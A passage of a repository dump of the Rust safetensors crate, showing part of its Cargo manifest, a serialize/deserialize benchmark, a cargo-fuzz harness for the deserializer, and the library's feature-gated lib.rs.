15 | The format is 8 bytes which is an unsized int, being the size of a JSON header, 16 | the JSON header refers the `dtype` the `shape` and `data_offsets` which are the offsets 17 | for the values in the rest of the file. 18 | """ 19 | exclude = [ "rust-toolchain", "target/*", "Cargo.lock"] 20 | 21 | 22 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 23 | 24 | [dependencies] 25 | hashbrown = { version = "0.15.2", features = ["serde"], optional = true } 26 | serde = { version = "1.0", default-features = false, features = ["derive"] } 27 | serde_json = { version = "1.0", default-features = false } 28 | 29 | [dev-dependencies] 30 | criterion = "0.5" 31 | memmap2 = "0.9" 32 | proptest = "1.4" 33 | 34 | [features] 35 | default = ["std"] 36 | std = ["serde/default", "serde_json/default"] 37 | alloc = ["serde/alloc", "serde_json/alloc", "hashbrown"] 38 | 39 | [[bench]] 40 | name = "benchmark" 41 | harness = false 42 | -------------------------------------------------------------------------------- /safetensors/LICENSE: -------------------------------------------------------------------------------- 1 | ../LICENSE -------------------------------------------------------------------------------- /safetensors/README.md: -------------------------------------------------------------------------------- 1 | ../README.md -------------------------------------------------------------------------------- /safetensors/benches/benchmark.rs: -------------------------------------------------------------------------------- 1 | use criterion::{black_box, criterion_group, criterion_main, Criterion}; 2 | use safetensors::tensor::*; 3 | use std::collections::HashMap; 4 | 5 | // Returns a sample data of size 2_MB 6 | fn get_sample_data() -> (Vec, Vec, Dtype) { 7 | let shape = vec![1000, 500]; 8 | let dtype = Dtype::F32; 9 | let n: usize = shape.iter().product::() * dtype.size(); // 4 10 | let data = vec![0; n]; 11 | 12 | (data, shape, dtype) 13 | } 14 | 15 | pub fn bench_serialize(c: &mut Criterion) { 16 | let (data, shape, dtype) = get_sample_data(); 17 | let n_layers = 5; 18 | 19 | let mut metadata: HashMap = HashMap::new(); 20 | // 2_MB x 5 = 10_MB 21 | for i in 0..n_layers { 22 | let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap(); 23 | metadata.insert(format!("weight{i}"), tensor); 24 | } 25 | 26 | c.bench_function("Serialize 10_MB", |b| { 27 | b.iter(|| { 28 | let _serialized = serialize(black_box(&metadata), black_box(&None)); 29 | }) 30 | }); 31 | } 32 | 33 | pub fn bench_deserialize(c: &mut Criterion) { 34 | let (data, shape, dtype) = get_sample_data(); 35 | let n_layers = 5; 36 | 37 | let mut metadata: HashMap = HashMap::new(); 38 | // 2_MB x 5 = 10_MB 39 | for i in 0..n_layers { 40 | let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap(); 41 | metadata.insert(format!("weight{i}"), tensor); 42 | } 43 | 44 | let out = serialize(&metadata, &None).unwrap(); 45 | 46 | c.bench_function("Deserialize 10_MB", |b| { 47 | b.iter(|| { 48 | let _deserialized = SafeTensors::deserialize(black_box(&out)).unwrap(); 49 | }) 50 | }); 51 | } 52 | 53 | criterion_group!(bench_ser, bench_serialize); 54 | criterion_group!(bench_de, bench_deserialize); 55 | criterion_main!(bench_ser, bench_de); 56 | -------------------------------------------------------------------------------- /safetensors/fuzz/.gitignore: -------------------------------------------------------------------------------- 1 | target 2 | corpus 3 | artifacts 4 | coverage 5 | -------------------------------------------------------------------------------- /safetensors/fuzz/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "safetensors-fuzz" 3 | version = "0.0.0" 4 | publish = false 5 | edition = "2021" 6 | 7 | [package.metadata] 8 | cargo-fuzz = true 9 | 10 | [dependencies] 11 | libfuzzer-sys = "0.4" 12 | 13 | [dependencies.safetensors] 14 | path = ".." 15 | 16 | # Prevent this from interfering with workspaces 17 | [workspace] 18 | members = ["."] 19 | 20 | [profile.release] 21 | debug = 1 22 | 23 | [[bin]] 24 | name = "fuzz_target_1" 25 | path = "fuzz_targets/fuzz_target_1.rs" 26 | test = false 27 | doc = false 28 | -------------------------------------------------------------------------------- /safetensors/fuzz/fuzz_targets/fuzz_target_1.rs: -------------------------------------------------------------------------------- 1 | #![no_main] 2 | 3 | use libfuzzer_sys::fuzz_target; 4 | use safetensors::tensor::SafeTensors; 5 | 6 | fuzz_target!(|data: &[u8]| { 7 | let _ = SafeTensors::deserialize(data); 8 | }); 9 | -------------------------------------------------------------------------------- /safetensors/src/lib.rs: -------------------------------------------------------------------------------- 1 | #![deny(missing_docs)] 2 | #![doc = include_str!("../README.md")] 3 | #![cfg_attr(not(feature = "std"), no_std)] 4 | pub mod slice; 5 | pub mod tensor; 6 | /// serialize_to_file only valid in std 7 | #[cfg(feature = "std")] 8 | pub use tensor::serialize_to_file; 9 | pub use tensor::{serialize, Dtype, SafeTensorError, SafeTensors, View}; 10 | 11 | #[cfg(feature = "alloc")] 12 | #[macro_use] 13 | extern crate alloc; 14 | 15 | #[cfg(all(feature = "std", feature = "alloc"))] 16 | compile_error!("must choose either the `std` or `alloc` feature, but not both."); 17 | #[cfg(all(not(feature = "std"), not(feature = "alloc")))] 18 | compile_error!("must choose either the `std` or `alloc` feature"); 19 | 20 | /// A facade around all the types we need from the `std`, `core`, and `alloc` 21 | /// crates. This avoids elaborate import wrangling having to happen in every 22 | /// module. 23 | mod lib { 24 | #[cfg(not(feature = "std"))] 25 | mod no_stds { 26 | pub use alloc::borrow::Cow; 27 | pub use alloc::string::{String, ToString}; 28 | pub use alloc::vec::Vec; 29 | pub use hashbrown::HashMap; 30 | } 31 | #[cfg(feature = "std")] 32 | mod stds { 33 | pub use std::borrow::Cow; 34 | pub use std::collections::HashMap; 35 | pub use std::string::{String, ToString}; 36 | pub use std::vec::Vec; 37 | } 38 | /// choose std or no_std to export by feature flag 39 | #[cfg(not(feature = "std"))] 40 | pub use no_stds::*; 41 | #[cfg(feature = "std")] 42 | pub use stds::*; 43 | } 44 | --------------------------------------------------------------------------------